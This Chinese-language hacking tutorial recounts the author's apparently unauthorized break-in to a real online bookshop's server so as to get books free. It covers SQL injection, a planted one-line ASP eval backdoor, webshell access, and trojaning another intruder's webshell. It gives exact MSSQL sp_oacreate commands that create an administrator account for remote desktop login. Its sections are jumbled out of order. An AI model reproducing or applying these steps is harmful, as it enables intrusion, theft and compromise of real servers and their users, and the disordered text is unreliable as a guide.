一.“战争”序幕的拉开
是windows2000服务器版的!知道了目标主机的一些基本信息,现在我们就针对这些信息来想出对应的入侵方案,110和25端口好像没什么重要的漏洞,所以先放一边,1433是MSSQL服务开放的端口,默认帐户sa不知道有没有弱口令,试试看,用SQL综合利用工具连接用户SA,密码为空试试,图4, 提示连接失败,看来密码不为空,想想也对!管理员怎么能傻到那种程度?再试试sqlhello-SQL溢出看看对方MSSQL打没有打SP3(现在国内很多你无法想象的超级大站还存在这种低级漏洞呢!具体,我可不敢说!呵呵),图5
正向和反向的溢出都试过都是不行,看来这个漏洞是没有了!剩下的只有80端口了,一般这个都是找脚本漏洞,在网站上找形如“xxx.asp?id=1"这样的页面,这个站上有很多,随便试一个在后面加个单引号看看,图6 一般出现像“错误 '80040e14' ”这样的都是说明存在SQL注入,那句“ODBC SQL Server Driver”一般有“ODBC”的说明是MSSQL数据库的,要是提示“JET”那就是ACCESS数据库了!我们再用工具找找看,拿出“啊D注入工具”扫扫,然后我用“HDSI”注入(完全是个人习惯!),在啊D中的“注入点扫描”中输入网站的URL,点击右边第一个按钮就会自动检测了,图7 哈哈!有了!马上将注入点复制到HDSI中进行注入,点击“开始”,图8, 提示“上传文件不成功!”怎么办?没事既然是sa的权限不能这样上传还有别的办法,试了试用xp_cmdshell直接加用户,TFTP上传,写脚本上传统统失败了!我郁闷,真想一头撞死算了!到嘴的美味吃不上,别提多难受了555...怎么办?我想...我再想...有了,既然这个站已经被人入侵过了,那么肯定会留下一些ASP木马要是能找到一个小的ASP木马不就可以上传大马了?虽然比较笨,不过黑猫白猫能捉到老鼠就是好猫了!我找...我继续找...再次来到网站目录下挨个看文件夹,突然看到一个MDB的目录,心情开始激动了,颤抖的手点了下去(哈哈!有点夸张)。哇塞!,图11 这回成功拿到webshell了(图15 ) 对了忘记告诉大家刚刚跟guestbook.asp同一目录下的那个a.asp就是别人留的海洋2006的asp木马! 小插曲 访问那个a.asp将html代码保存下来,这里的代码就是海洋2006的登陆界面,然后用我的木马编辑那个a.asp将里面的代码全部清空掉,粘贴上刚刚复制的登陆页面的html代码,再在最下面挂上我的网页木马!哈哈!这样只要那家伙访问自己的webshell虽然看到登陆界面了但是怎么也登陆不进去,而且还中了咱们的木马!一个字爽! 三.拿下目标 “common/inc_const.asp”这个就是ASP被打开后先调用的数据库连接文件了,我们马上到该目录下的common找到inc_const.asp对它编辑,图17 现在该怎么办呢?拿出SQL连接器输入密码连接上去,哈哈成功了,选择“利用目录”==》“执行DOS命令”加个用户试试,图18 晕,xplog70.dll被删了,可恶,既然开了3389只要加个用户就可以了,加用户也不一定要用XP_cmdshell,可以试试别的转储过程,打开"SQL查询分析器分离版本"输入IP和密码点连接,图19 OK,我们在“查询”中输入: ------------------------------------------------ declare @cmd INT exec sp_oacreate 'wscript.shell',@cmd output exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true' ----------------------------------------------- declare @cmd INT exec sp_oacreate 'wscript.shell',@cmd output exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true' -------------------------------------------------- 这个就是增加一个hack的用户密码也是hack,再提升为管理员权限,图20 用增加的用户登陆3389看看 哈哈,成功!任务完成!^_^ 四.小结
看了一下这个网站支持在线购买图书,要是那样的话...呵呵!进去了不就可以免费买书了?反正也没事干,那么就开始吧!
二.轮番轰炸
既然已经被人挂了马,那就是有人进去过了(废话),大体观察了一下,它的网站是ASP+MSSQL的,没有什么论坛,看来想拿webshell不是很容易。
还是看看它开了什么端口吧!
小提示
菜鸟:为什么很多文章中都提到扫描端口,扫描端口到底有什么用呢?
小鱼:理论的东西我不想多讲了,通常说的扫描端口是指扫描TCP端口,系统中的每个网络服务要与外部通信就必须用到端口,什么意思呢?就好比你跟聋哑人沟通用的是手语,不同的系统服务会用到不同的端口,比如开网站的服务器,就肯定开放了80端口,根据端口的开放情况可以判断对方开了哪些服务从而方便我们找对应的漏洞或者溢出!
手头刚好有流光那就用它吧,一会儿功夫扫描结果就出来了,图2
开了80,110,25,1433,3389这几个端口,110和25是发送邮件时用到的,3389不知道是先前的入侵者开的还是管理员自己管理用开的!IIS版本是5.0可能是win2K的服务器,我们登陆3389看看,为什么要登陆3389?你还没有权限怎么登陆啊?登陆3389的目的主要是看看对方系统版本,图3
高兴ing,连接数据库的用户居然是SA这下发财了,一条思路马上展现在眼前,就是用HDSI找到web目录,然后通过数据库备份上传ASP木马,hoho!点击HDSI左边的“列目录”开始寻找网站目录,我找啊找...终于被我找到了,图9
d:\xxxxhome下,马上将一个ASP木马的后缀改为txt用HDSI上传到web目录下,郁闷,图10
这样就是没有做防下载处理,然后马上在留言板中留言在“主页”还有其他地方都输入了“ <%eval request("#")%> ”提交成功,用海洋c端连接发现还是不成功(可能是被过滤掉了吧!)!怎么办呢?郁闷...于是用迅雷下载了这个ASP数据库改名为MDB后打开,找出管理员账号密码,图13
我用的也是海洋2006不过是加密免杀的,现在就是提权了,用海洋的“服务器相关数据”看了看开的服务,发现并没有安装serv-U,很多菜鸟看到这里可能就会放弃了!其实没有serv-u也没关系,毕竟条条大陆通罗马么!还记得刚刚注入时是SA的权限么?这就说明数据库连接用的是SA,到网站主页下随便打开一个ASP文件看看,图16 
怎么样?是不是有大发现了,其实提权就是这么简单!SA密码暴露无疑啊!
怎么样?是不是条条大路通罗马?
由于篇幅问题还有很多入侵的过程没有写出来,这里写的是主要的入侵过程了,文章读起来很简单(我在实际中可是遇到很多问题),但要是你实际操作起来可能就会遇到很多问题了,想告诉广大菜鸟朋友:真正的技术是实践出来的不是看出来的。这里不仅给大家展示的是一次入侵过程更想把入侵中分析问题的思想传达给各位菜鸟朋友们,由于我水平有限可能文章有很多不足之处,所以还请各位见笑了!
文章来源于领测软件测试网 https://www.ltesting.net/
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备10010545号-5
技术支持和业务联系:info@testage.com.cn 电话:010-51297073